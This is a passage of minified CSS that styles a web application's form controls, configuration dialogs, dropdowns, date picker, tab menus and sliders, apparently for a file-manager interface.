1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px 